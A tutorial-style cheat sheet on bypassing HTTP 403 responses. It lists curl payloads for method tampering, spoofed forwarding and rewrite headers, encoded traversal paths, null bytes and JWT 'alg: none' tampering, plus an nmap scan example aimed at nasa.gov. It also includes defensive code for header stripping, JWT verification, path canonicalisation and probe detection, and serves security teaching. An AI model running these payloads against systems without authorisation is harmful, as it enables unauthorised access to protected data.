403 Bypass Techniques

Master advanced techniques to bypass 403 Forbidden responses using HTTP method tampering, header manipulation, path fuzzing, and encoding tricks.

Introduction to 403 Bypass

What is 403 Bypass?
403 bypass = techniques to reach endpoints that answer 403 Forbidden by exploiting inconsistencies in how the proxy, web server and application parse and authorize the same HTTP request

Primary targets for 403 bypass
Common in bug bounty: admin panels, config files, backup directories

Why bypass 403 errors?
Goal: access restricted content without authentication/authorization
1. HTTP Method Tampering

#1 Try OPTIONS method (often less restricted)
curl -X OPTIONS --path-as-is https://example.com/private/

#2 Try GET with --path-as-is
curl -X GET --path-as-is https://example.com/private/

#3 Try POST method
curl -X POST --path-as-is https://example.com/private/

#4 Try PUT method
curl -X PUT --path-as-is https://example.com/private/

#5 Try DELETE method
curl -X DELETE --path-as-is https://example.com/private/

#6 Try PATCH method
curl -X PATCH --path-as-is https://example.com/private/

#7 Try HEAD method (no response body; use -I, because -X HEAD makes curl wait for a body that never arrives)
curl -I --path-as-is https://example.com/private/

#8 Try TRACE method (may reveal config)
curl -X TRACE --path-as-is https://example.com/private/

#9 Try CONNECT method
curl -X CONNECT --path-as-is https://example.com/private/

#10 Try PROPFIND (WebDAV)
curl -X PROPFIND --path-as-is https://example.com/private/

#11 Try MKCOL (WebDAV)
curl -X MKCOL --path-as-is https://example.com/private/

#12 Try MOVE method
curl -X MOVE --path-as-is https://example.com/private/

#13 Try LOCK method
curl -X LOCK --path-as-is https://example.com/private/

Important: always use --path-as-is for encoded paths
--path-as-is stops curl from squashing /../ and /./ sequences before sending, so the server receives exactly the path you typed (critical for encoded and traversal payloads)
2. Header Manipulation

#1 X-Original-URL: rewrite the URL path (Nginx reverse proxy)
curl -H "X-Original-URL: /admin" https://example.com/some-page

#2 X-Rewrite-URL: similar to X-Original-URL
curl -H "X-Rewrite-URL: /admin" https://example.com/some-page

#3 Spoof an internal IP (localhost) to bypass IP restrictions
curl -H "X-Custom-IP-Authorization: 127.0.0.1" https://example.com/private/

#4 X-Forwarded-For: spoof the client IP
curl -H "X-Forwarded-For: 127.0.0.1" https://example.com/private/

#5 X-Client-IP: another IP spoofing header
curl -H "X-Client-IP: 127.0.0.1" https://example.com/private/

#6 Manipulate the host value for host-based access controls
curl -H "X-Host: localhost" https://example.com/private/

#7 Trick the server into trusting the request source
curl -H "Referer: http://trustedsite.com/" https://example.com/private/
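The header tricks above only work when something behind the edge believes a client-supplied header. The following is an added defender-side example, not code from this page or from any tool it mentions, showing how an edge or application layer should treat those headers: drop every URL/IP override outright, resolve the client address from X-Forwarded-For only through proxies it trusts, and refuse to route on a missing or unknown Host (the trick in section 11). OVERRIDE_HEADERS is built from the header names listed on this page; TRUSTED_PROXIES and ALLOWED_HOSTS are assumptions for a hypothetical deployment.

```python
import ipaddress

# Headers from this page that a client can set to rewrite the URL or claim an
# internal source address. None is an end-to-end standard header, so the edge
# strips them before the application sees the request.
OVERRIDE_HEADERS = {
    "x-original-url", "x-rewrite-url", "x-custom-ip-authorization",
    "x-host", "x-forwarded-host", "x-client-ip",
}

# Hypothetical deployment: only our own reverse proxies may speak for a client
# via X-Forwarded-For / X-Real-IP.
TRUSTED_PROXIES = [ipaddress.ip_network("10.0.0.0/8")]

# Hypothetical virtual-host allow list.
ALLOWED_HOSTS = {"example.com", "www.example.com"}


def _header(headers, name):
    """Case-insensitive lookup; HTTP header names are case-insensitive."""
    wanted = name.lower()
    for key, value in headers.items():
        if key.lower() == wanted:
            return value
    return None


def strip_override_headers(headers):
    """Copy of the header map with every client-controlled override removed."""
    return {k: v for k, v in headers.items() if k.lower() not in OVERRIDE_HEADERS}


def _is_trusted(addr):
    return any(addr in net for net in TRUSTED_PROXIES)


def client_ip(remote_addr, headers):
    """Resolve the real client address.

    X-Forwarded-For is a comma-separated chain to which each proxy appends the
    peer it spoke to. Only entries appended by trusted proxies mean anything, so
    walk the chain from the right (the TCP peer) and stop at the first address
    that is not ours. A forged "127.0.0.1" sent by the client sits to the left
    of the real client address and is never reached.
    """
    chain = [remote_addr]
    xff = _header(headers, "X-Forwarded-For")
    if xff:
        chain = [hop.strip() for hop in xff.split(",") if hop.strip()] + chain
    for hop in reversed(chain):
        try:
            addr = ipaddress.ip_address(hop)
        except ValueError:
            return remote_addr      # garbage in the chain: trust only the socket peer
        if not _is_trusted(addr):
            return hop
    return chain[0]                 # every hop is ours: the leftmost entry is the client


def is_internal_client(remote_addr, headers):
    """What an 'internal only' route checks instead of trusting a header value."""
    return ipaddress.ip_address(client_ip(remote_addr, headers)).is_loopback


def effective_host(headers):
    """Return the Host to route on, or None when it is absent or not ours.

    A request with no Host header (curl -H "Host:") must not fall through to a
    default server block that happens to serve protected content.
    """
    host = _header(headers, "Host")
    if not host:
        return None
    host = host.split(":", 1)[0].lower()
    return host if host in ALLOWED_HOSTS else None
```

The proxy in front of this code must append to X-Forwarded-For rather than pass the client's value through unchanged; otherwise there is no trustworthy entry in the chain and client_ip() correctly falls back to the socket peer.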
3. Path Fuzzing & Encoding

#1 URL-encoded .. (../) to reach admin
curl -g --path-as-is "https://example.com/%2e%2e/admin"

#2 Fully encoded ../ (%2e%2e%2f)
curl -g --path-as-is "https://example.com/%2e%2e%2fadmin"

#3 Encoded ../ followed by a second encoded slash
curl -g --path-as-is "https://example.com/%2e%2e%2f%2fadmin"

#4 ./admin with encoded dot and slash
curl -g --path-as-is "https://example.com/%2e%2fadmin"

#5 admin/ (trailing encoded slash)
curl -g --path-as-is "https://example.com/admin%2f"

#6 Double-encoded slash at end
curl -g --path-as-is "https://example.com/admin%252f"

#7 Space before path (%20)
curl -g --path-as-is "https://example.com/%20/admin"

#8 Trailing space encoded
curl -g --path-as-is "https://example.com/admin%20"

#9 Add dot at end (may trick regex)
curl -g --path-as-is "https://example.com/admin."

#10 Double slashes (may bypass normalization)
curl -g --path-as-is "https://example.com//admin"

#11 Backslash (Windows path confusion; single quotes keep the shell from treating \" as an escaped quote)
curl -g --path-as-is 'https://example.com/admin\'

#12 Mixed slashes (break parsers)
curl -g --path-as-is "https://example.com/admin"

#13 Overlong UTF-8 encoding of / (%c0%af, accepted by lenient decoders)
curl -g --path-as-is "https://example.com/admin%c0%af"

#14 Unicode fullwidth slash (U+FF0F)
curl -g --path-as-is "https://example.com/admin%ef%bc%8f"
Case Manipulation

#1 Lowercase admin
curl https://example.com/admin

#2 Capitalize first letter
curl https://example.com/Admin

#3 All uppercase
curl https://example.com/ADMIN

#4 Mixed case 1
curl https://example.com/aDmin

#5 Mixed case 2
curl https://example.com/AdMiN

#6 Mixed case 3
curl https://example.com/aDMIN

#7 Mixed case 4
curl https://example.com/ADMin
Adding Suffixes

#1 Add .json extension
curl https://example.com/admin.json

#2 Add .css extension
curl https://example.com/admin.css

#3 Add .js extension
curl https://example.com/admin.js

#4 Add .html extension
curl https://example.com/admin.html

#5 Add .php extension
curl https://example.com/admin.php

#6 Add .aspx extension
curl https://example.com/admin.aspx

#7 Add .xml extension
curl https://example.com/admin.xml

#8 Add .txt extension
curl https://example.com/admin.txt

#9 Add .bak extension (backup)
curl https://example.com/admin.bak

#10 Add .old extension
curl https://example.com/admin.old

#11 Add .zip extension (archive)
curl https://example.com/admin.zip

#12 Add .tar.gz extension
curl https://example.com/admin.tar.gz
Parameter Tampering

#1 Add an unused parameter
curl "https://example.com/admin?unused_param=1"

#2 Add a redirect parameter
curl "https://example.com/admin?redirect=allowed"

#3 Enable debug mode if supported
curl "https://example.com/admin?debug=true"

#4 Add a fake access parameter
curl "https://example.com/admin?access=granted"

#5 Add a fake token parameter
curl "https://example.com/admin?token=123"
5. JWT Token Tampering

Step 1: Decode the JSON Web Token
Decode the JWT at jwt.io

Step 2: Modify the payload and change the algorithm
Change the role and remove the signature (set algorithm to none)

Step 3: Resend with the modified JWT
curl -H "Authorization: Bearer <MODIFIED_JWT>" https://example.com/adminarea
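Each of the three steps above succeeds only if the verifier lets the token dictate how it is checked. The following is an added example, not code from this page or from any library it mentions, of a verifier that pins the algorithm itself, treats a missing signature as a failure rather than as "none", and compares the HMAC in constant time; make_token() exists so the rejected shapes can be built as test vectors. SECRET is a constructed key for the example and the standard-library HMAC is used in place of a JWT library.

```python
import base64
import hashlib
import hmac
import json
import time

# Constructed key for the example; a real service loads it from a secret store.
SECRET = b"example-hs256-key-do-not-use"
ALLOWED_ALG = "HS256"      # fixed by the verifier, never read from the token header


def b64url_encode(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")


def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def _signing_input(header, payload):
    compact = {"separators": (",", ":")}
    return (b64url_encode(json.dumps(header, **compact).encode()) + "."
            + b64url_encode(json.dumps(payload, **compact).encode()))


def make_token(header, payload, signature):
    """Assemble header.payload.signature. Used by issue() and for test vectors."""
    return _signing_input(header, payload) + "." + b64url_encode(signature)


def issue(payload):
    """Issue a genuine HS256 token for the given claims."""
    header = {"alg": ALLOWED_ALG, "typ": "JWT"}
    sig = hmac.new(SECRET, _signing_input(header, payload).encode(), hashlib.sha256).digest()
    return make_token(header, payload, sig)


def verify(token, now=None):
    """Return the claims if the token is genuine, otherwise None.

    Each check defeats one step of the tampering sequence described above.
    """
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:
        return None                         # signature removed
    header_b64, payload_b64, sig_b64 = parts
    try:
        header = json.loads(b64url_decode(header_b64))
        payload = json.loads(b64url_decode(payload_b64))
        signature = b64url_decode(sig_b64)
    except ValueError:                      # binascii.Error is a ValueError too
        return None                         # malformed base64 or JSON
    if not isinstance(header, dict) or header.get("alg") != ALLOWED_ALG:
        return None                         # "alg": "none", or any algorithm we did not pin
    expected = hmac.new(SECRET, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(signature, expected):
        return None                         # payload (e.g. role) edited after signing
    if not isinstance(payload, dict):
        return None
    exp = payload.get("exp")
    current = time.time() if now is None else now
    if exp is not None and current >= exp:
        return None                         # expired
    return payload
```

The verifier never branches on the header's alg value except to confirm it equals the one pinned in code; a token asking for "none", or for a different family of algorithm, fails before any signature math is attempted.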
6. Null Byte Injection

#1 Null byte with .html suffix
curl --path-as-is "https://example.com/admin.php%00.html"

#2 Null byte with .json suffix
curl --path-as-is "https://example.com/config.php%00.json"

#3 Null byte before the query string
curl --path-as-is "https://example.com/login.php%00?redirect=admin"

#4 Null byte in a path segment
curl --path-as-is "https://example.com/user/profile%00.php"

#5 Null byte in an image path
curl --path-as-is "https://example.com/images/logo%00.jpg"

#6 Null byte directly in the filename
curl --path-as-is "https://example.com/admin%00.php"

#7 Null byte in an upload path
curl --path-as-is "https://example.com/uploads/file%00.zip"
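Sections 1, 3, Case Manipulation, Adding Suffixes and 6 all exploit the same gap: the component that says 403 and the component that serves the file disagree about which resource a request names. The following is an added example, not code from this page or from any project it mentions, of an access layer that removes that gap: every request path is reduced to one canonical form before the ACL is consulted, anything that cannot be canonicalised safely (NUL bytes, nested encoding, overlong UTF-8) is refused with 400, and the decision is the same for every HTTP verb. PROTECTED_PREFIXES, SERVED_METHODS and the "admin" role are assumptions for a hypothetical application.

```python
from urllib.parse import unquote_to_bytes


class BadPath(ValueError):
    """Paths that must be rejected with 400 before any routing or ACL lookup."""


# Hypothetical application: everything under these canonical prefixes needs the
# "admin" role, whatever method, case, suffix or encoding the request used.
PROTECTED_PREFIXES = ("/admin", "/private", "/config")

# Methods the application actually serves. Everything else answers 405, so there
# is no "less restricted" verb (TRACE, PROPFIND, MKCOL, MOVE, LOCK ...) to try.
SERVED_METHODS = {"GET", "HEAD", "POST", "PUT", "PATCH", "DELETE", "OPTIONS"}


def canonical_path(raw_path):
    """Reduce a request path to the single form the ACL is written against."""
    path = raw_path.split("?", 1)[0]             # the query string never selects a resource
    decoded = unquote_to_bytes(path)             # percent-decode exactly once, on bytes
    if b"\x00" in decoded:
        raise BadPath("NUL byte in path")         # admin.php%00.html
    if b"%" in decoded:
        raise BadPath("nested percent-encoding")  # admin%252f: never decode a second time
    try:
        text = decoded.decode("utf-8")            # strict decoder refuses overlong %c0%af
    except UnicodeDecodeError as exc:
        raise BadPath("invalid UTF-8 in path") from exc
    # Characters some stacks treat as a separator: backslash, fullwidth solidus.
    text = text.replace("\\", "/").replace("\uff0f", "/")
    segments = []
    for seg in text.split("/"):
        seg = seg.strip()                         # %20/admin, admin%20
        if seg == "..":
            if segments:
                segments.pop()                    # %2e%2e/admin resolves to /admin
            continue
        seg = seg.rstrip(".")                     # admin. -> admin (Windows/IIS semantics)
        if seg in ("", "."):
            continue                              # //admin, ./admin, admin/
        segments.append(seg.lower())              # Admin, ADMIN, aDmIn
    return "/" + "/".join(segments)


def is_protected(canon):
    """Match the canonical path with its extension removed, so admin.json,
    admin.bak and admin.tar.gz are all the admin resource."""
    parent, _, leaf = canon.rpartition("/")
    stem_path = parent + "/" + leaf.split(".", 1)[0]
    return any(stem_path == p or canon.startswith(p + "/") for p in PROTECTED_PREFIXES)


def authorize(method, raw_path, roles):
    """Return the status the access layer should answer with."""
    method = method.upper()
    if method not in SERVED_METHODS:
        return 405
    try:
        canon = canonical_path(raw_path)
    except BadPath:
        return 400
    if is_protected(canon) and "admin" not in roles:
        return 403          # identical answer for GET, HEAD, OPTIONS, POST, ...
    return 200
```

Rejecting a second layer of percent-encoding instead of decoding it again is a deliberate choice: a literal "%" in a resource name is rare, while decode-twice behaviour is exactly what the admin%252f probe looks for. The check must run in the same component that serves the resource, or on the exact canonical form that component will use; a WAF that normalises differently from the origin just moves the gap.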
7. HTTP Version Downgrade

#1 Try HTTP/1.0 (older, less strict)
curl --http1.0 https://example.com/private/

#2 HTTP/1.0 for sensitive endpoints
curl --http1.0 https://example.com/secret

#3 HTTP/1.1 (legacy support)
curl --http1.1 https://example.com/config
8. Bypass with Proxy or IP Spoofing

#1 Use proxychains to route through a different IP
proxychains curl https://example.com/private/

#2 Spoof the IP with the X-Forwarded-For header
curl -H "X-Forwarded-For: 127.0.0.1" https://example.com/private/

#3 X-Real-IP header spoofing
curl -H "X-Real-IP: 127.0.0.1" https://example.com/private/
9. Switch Between HTTP and HTTPS

#1 Try HTTP (some servers only protect HTTPS)
curl http://example.com/private/

#2 Try HTTPS
curl https://example.com/private/

#3 Mixed protocol reference (compare both forms of the same path)
http://example.com/private/
https://example.com/private/
10. Explore Alternate Subdomains & Ports

#1 Try the admin subdomain
https://admin.example.com/admin/

#2 Try the dev subdomain
https://dev.example.com/admin/

#3 Try port 8080
http://example.com:8080/admin/

#4 Try port 8443 (SSL alternative)
https://example.com:8443/admin/

#5 Try port 8000
http://example.com:8000/admin/
11. Skipping the Host Header: A Sneaky Bypass Trick

Remove the Host header entirely (may default to localhost)
curl --path-as-is -H "Host:" https://example.com/private/
(-H "Host:" with an empty value tells curl to omit the header altogether)

Why it works: the server treats the request as internal
Misconfigured servers may default Host to 127.0.0.1 or localhost, or fall through to a default server block that serves the protected content
12. Accessing 403 Files Using the Wayback Machine

#1 Search all snapshots of a 403 file
https://web.archive.org/web/*/https://example.com/secret-file.txt

#2 Access a specific date snapshot
https://web.archive.org/web/20240101000000/https://example.com/secret-file.txt

Base URL format
https://web.archive.org/web/ (base URL for the Wayback Machine)

Target file that is now 403
https://example.com/secret-file.txt (target file to check for past versions)

Why it works: past versions may not have been protected
May reveal old snapshots from when the file was publicly accessible
Nmap: Discover Supported Methods

Scan for supported HTTP methods on the target
nmap --script http-methods -p80,443 example.com

Example: scan NASA.gov for HTTP methods
nmap --script http-methods -p80,443 www.nasa.gov

Nmap output lists the supported methods per port and ends with
Nmap done: 1 IP address (1 host up) scanned in X seconds
FFUF: Automated 403 Bypass

Automate header + URL payload fuzzing with ffuf
cat payloads/403_header_payloads.txt | while read header; do ffuf -w payloads/403_url_payloads.txt:PATH -u "https://example.com/PATH" -H "$header" -mc 200 -fs 0 -x http://172.23.96.1:8080; done
(the outer loop sends one header payload per ffuf run; -w ...:PATH binds the URL wordlist to the PATH keyword, -mc 200 keeps only 200 responses, -fs 0 drops empty bodies, and -x routes every request through a local proxy so each hit can be reviewed)

CoffinXP header payloads for 403 bypass
https://github.com/coffinxp/payloads/blob/main/403_header_payloads.txt

CoffinXP URL payloads for path fuzzing
https://github.com/coffinxp/payloads/blob/main/403_url_payloads.txt
Burp Suite 403 Bypass Extension

Challenge: manual testing is time-consuming
Testing 403 responses by hand is a slow process

Solution: use a Burp extension for automation
The Burp 403 Bypass extension automates header, method, and path manipulations

Example: accessing the endpoint returns 403 Forbidden
curl https://example.com/403-page

Benefit: automated detection of bypass opportunities
The extension quickly detects access control bypasses
4-ZERO-3 Tool

Automated 403/401 bypass tool (simple yet effective)
4-zero-3 -u https://target.com/secret --exploit

GitHub repo for the 4-ZERO-3 tool
https://github.com/Dheerajmadhukar/4-ZERO-3

Important: check content length and response content
Warning: may produce false positives; always verify manually
Risks of 403 Bypass Vulnerabilities

#1 Unauthorized access: attackers reach protected endpoints
Impact: exposure or manipulation of sensitive data

#2 Data breaches: access to private information
Impact: financial loss, legal consequences, reputational damage

#3 System integrity compromise: alteration of backend functionality
Impact: undermines system reliability and trust
Prevention & Mitigation

#1 Implement proper authentication & authorization checks
Use secure session management and role-based access control

#2 Avoid relying solely on HTTP method or header checks
Implement defense in depth for access control

#3 Use robust, tested access control libraries/frameworks
Don't roll your own access control logic

#4 Regularly audit and test access control mechanisms
Use automated tools + manual testing for 403 bypasses

#5 Monitor for suspicious access patterns and repeated 403s
Implement logging and alerting for access attempts
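Point #5 is actionable because every technique on this page leaves the same trace: one client collecting many 403s in a short window while varying the method, case or encoding of the same path. The following is an added example, not code from this page, that runs that detection over a few constructed access-log lines in the common log format; the thresholds, the five-minute window and the sample addresses are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Common log format: ip ident user [timestamp] "METHOD path PROTO" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample: one client walking through method, encoding and case
# variants from this page, plus two ordinary clients for contrast.
SAMPLE_LOG = """\
203.0.113.9 - - [01/Jan/2024:10:00:01 +0000] "GET /private/ HTTP/1.1" 403 153
203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "OPTIONS /private/ HTTP/1.1" 403 153
203.0.113.9 - - [01/Jan/2024:10:00:02 +0000] "POST /private/ HTTP/1.1" 403 153
203.0.113.9 - - [01/Jan/2024:10:00:03 +0000] "GET /%2e%2e/private/ HTTP/1.1" 403 153
203.0.113.9 - - [01/Jan/2024:10:00:04 +0000] "GET /PRIVATE/ HTTP/1.1" 403 153
203.0.113.9 - - [01/Jan/2024:10:00:05 +0000] "GET //private/ HTTP/1.0" 403 153
198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /private/ HTTP/1.1" 403 153
198.51.100.4 - - [01/Jan/2024:10:01:05 +0000] "GET /login HTTP/1.1" 200 2048
192.0.2.77 - - [01/Jan/2024:10:02:00 +0000] "GET /robots.txt HTTP/1.1" 404 196
"""

# Substrings a browser following a normal link essentially never produces.
ENCODING_MARKERS = ("%", "\\", "//", "..")


def parse_line(line):
    """Return a dict for one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    return rec


def looks_encoded(path):
    return any(marker in path for marker in ENCODING_MARKERS)


def find_probing_clients(lines, min_forbidden=5, min_variants=3,
                         window=timedelta(minutes=5)):
    """Return {ip: summary} for clients whose 403s inside `window` vary the
    method or path enough to look like bypass probing rather than a stray link."""
    forbidden = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["status"] == 403:
            forbidden[rec["ip"]].append(rec)

    flagged = {}
    for ip, recs in forbidden.items():
        recs.sort(key=lambda r: r["ts"])
        for i, first in enumerate(recs):          # sliding window over this client's 403s
            burst = [r for r in recs[i:] if r["ts"] - first["ts"] <= window]
            if len(burst) < min_forbidden:
                continue
            methods = {r["method"] for r in burst}
            paths = {r["path"] for r in burst}
            encoded = any(looks_encoded(r["path"]) for r in burst)
            if len(methods) >= min_variants or len(paths) >= min_variants or encoded:
                flagged[ip] = {
                    "forbidden": len(burst),
                    "methods": sorted(methods),
                    "paths": sorted(paths),
                    "encoded_paths": encoded,
                }
                break
    return flagged


if __name__ == "__main__":
    for ip, summary in find_probing_clients(SAMPLE_LOG.splitlines()).items():
        print(ip, summary)
```

The single 403 from 198.51.100.4 is not flagged, which is the point: the signal is variation, not volume alone. Feeding the raw request path (before any server-side normalisation) is what makes the encoding markers visible, so log at the edge rather than only in the application.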
Tools & Resources